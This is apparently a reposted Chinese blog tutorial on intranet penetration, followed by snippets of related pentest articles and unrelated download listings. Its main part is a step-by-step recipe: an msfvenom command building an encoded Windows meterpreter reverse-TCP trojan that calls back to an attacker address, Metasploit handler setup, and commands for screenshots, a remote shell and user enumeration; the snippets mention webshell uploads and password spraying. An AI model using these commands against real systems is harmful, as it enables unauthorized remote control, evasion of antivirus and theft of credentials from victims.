记一次内网渗透

最新推荐文章于 2024-06-03 10:47:29 发布
转载 最新推荐文章于 2024-06-03 10:47:29 发布 · 50 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/chenjingyi/p/7082110.html

本文介绍如何使用MSFVENOM生成木马文件,并通过Metasploit框架进行远程控制,包括设置监听地址和端口、上传木马文件及执行命令等步骤。

1.生成一个木马文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.20.11 LPORT=1234 -f exe >test.exe

2.将生成的木马上传到目标机器上

3.启动msfconsole。

4.准备工作

(1)use exploit/multi/handler

(2)set LHOST 192.168.20.11

(3)set LPORT 1234

(4)exploit

(5)运行之前准备的木马文件

5.开始试验:

(1)执行screenshot 可以截屏,然后去验证。

(2)输入shell,就返回一个shell

(3)试一下net user 没问题。

  到这里,就已经成功获取权限了。

 

转载于:https://www.cnblogs.com/chenjingyi/p/7082110.html

一次某单位的内网渗透测试
黑战士的博客
06-20 800
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
一次内网渗透过程
2301_80115097的博客
04-08 794
一切以学习为主,一次小小的攻击过程本次是通过外网漏洞撕开的口子,主要通过一下方式拿到了目标资产nday扫一扫弱口令爆一爆上传接口找一找后台上传找一找数据库弱口令关注新day,有了立马在资产里面跑一下逻辑漏洞什么的就不要了,只要能getshell1、现在的内网渗透总要面对杀软,时时刻刻都要有自己一套绕过杀软或免杀的能力,过不去杀软都是浮云2、内网主要就是信息收集,需要收集好本地密码、浏览器录、数据库密码、可达网段、多网卡机器、重点目标、是否有域等等。
一次内网渗透测试实训总结
qq_36410265的博客
06-20 4765
时间很快就来到了学期的最后一个月,和上学期一样,最后的几周是实训周,而这次实训恰好就是我比较喜欢的网络攻防,因为之前学过相关的知识,做过一些靶场,相比于其他同学做起来要快些,不过内网渗透也还是头一次,得益于这次的内网渗透靶场环境,小小地体验了一下,期间也踩了许多坑,也陆陆续续地解决掉了。所以就以本篇文章做个总结,目的在于梳理所学到地知识点和分享。物理机 (win 10) ip:172.20.10.1工具:、攻击机(kali) ip:172.20.10.129工具:、、、、、 …靶场拓扑图首先需要拿到...
一次完整的内网渗透经历
渗透测试研究中心
01-19 436
故事的起因比较简单,用三个字来概括吧:闲得慌。 因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。 所以这里直接尝试cs自带的Scripted Web Delivery模块,直接创建一个web服务用...
一次内网渗透靶场学习
hongduilanjun的博客
04-08 3703
title: 红日靶场2 tags: 内网渗透 date: 2021/07/21 本文首发于先知社区:https://xz.aliyun.com/t/9851 一次靶场渗透。 环境搭建 web: 外网ip - 192.168.10.80 内网ip - 10.10.10.80 PC: 外网ip - 192.168.10.201 内网ip - 10.10.10.201 DC: 内网ip - 10.10.10.10 web、PC、DC都处于同一域环境内,需要手动开启weblogic服务 外网 端口探测 首.
渗透测试——一次内网渗透实战经验
qq_44484541的博客
06-07 584
用友GRP-U8任意文件上传漏洞 1、通过漏洞扫描检测到服务器192.168.110.109,存在用友GRP-U8任意文件上传漏洞 2、利用burp构造漏洞测试文件 3、访问测试文件成功,存在任意文件上传漏洞 4、通过burp 工具构建攻击数据包,上传webshell,回显200 5、通过蚁剑连接工具访问webshell,获取到服务器system权限
一次内网靶场渗透测试
白帽子凯哥聊黑客
06-03 735
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。9. 在当前主机先进行简单的信息搜集,当前用户为administrator且主机未安装杀软,存在双网卡192.168.0.0/24 10.10.10.0/24,存在域环境。4.存在wc.db将其下载下来,使用工具打开,里面存在网站目录文件信息,查看网站目录信息后,可以了解网站的基本架构。6.使用前面获取的管理员账号密码进行登录,可以测试发现验证码是存在缺陷,也可以使用大字典来爆破出管理员的密码。
【安全学习】一次内网环境渗透
kali_Ma的博客
11-21 2699
通过上述过程,我们对比如GPP,约束委派,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。
攻防演练 | 一次内网渗透过程
2301_80115097的博客
04-12 1257
1、现在的内网渗透总要面对杀软,时时刻刻都要有自己一套绕过杀软或免杀的能力,过不去杀软都是浮云2、内网主要就是信息收集,需要收集好本地密码、浏览器录、数据库密码、可达网段、多网卡机器、重点目标、是否有域等等3、横向移动,本次主要用了密码喷洒,信息收集后发现内网机器并不多,就没再继续横向4、重点资产要特别关注,像一下堡垒机、天擎、这样的终端控制服务,拿下后直接游戏结束。
内网渗透一次录 作者:Jaky.pdf
04-08
本文基于《内网渗透一次录》这一实战案例,详细解析了内网渗透的具体步骤和技术要点。 #### 二、环境准备 在进行内网渗透之前,需要做好充分的准备工作。主要包括生成远控木马、部署木马以及设置监听环境等...
【微信小程序源码】小程序完整demo:飞翔的小鸟:canvas实现,java后端(适用1221).zip
09-06
资源说明: 1:本资料仅用作交流学习参考,请切勿用于商业用途。 2:一套精品实用微信小程序源码资源,无论是入门练手还是项目复用都超实用,省去重复开发时间,让开发少走弯路! 更多精品资源请访问 https://blog.youkuaiyun.com/ashyyyy/article/details/146464041
轴承噪声分析.zip
最新发布
09-06
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
podam-7.2.11.RELEASE.jar中文-英文对照文档.zip
09-06
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
aws-java-sdk-redshiftdataapi-1.12.780.jar中文-英文对照文档.zip
09-06
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
json-schema-validator-1.5.7.jar中文-英文对照文档.zip
09-06
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
基于SSH的个人信息管理系统_使用Bootstrap前端框架与Struts2_Spring3_Hibernate4后端集成技术结合MySQL数据库实现用户登录注册_个人信息修改_头.zip
09-06
基于SSH的个人信息管理系统_使用Bootstrap前端框架与Struts2_Spring3_Hibernate4后端集成技术结合MySQL数据库实现用户登录注册_个人信息修改_头.zip
爱普生打印机驱动LQ-610K-615K
09-06
爱普生打印机驱动LQ-610K-615K
内网渗透实战:从Webshell到权限提升
"内网渗透一次录 作者:Jaky" 本文主要介绍了作者Jaky进行内网渗透的实战过程,旨在分享内网渗透技术及其步骤。文章首先强调了在渗透测试中,通常先获取到低权限的Webshell或反弹shell,随后需要提升权限并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值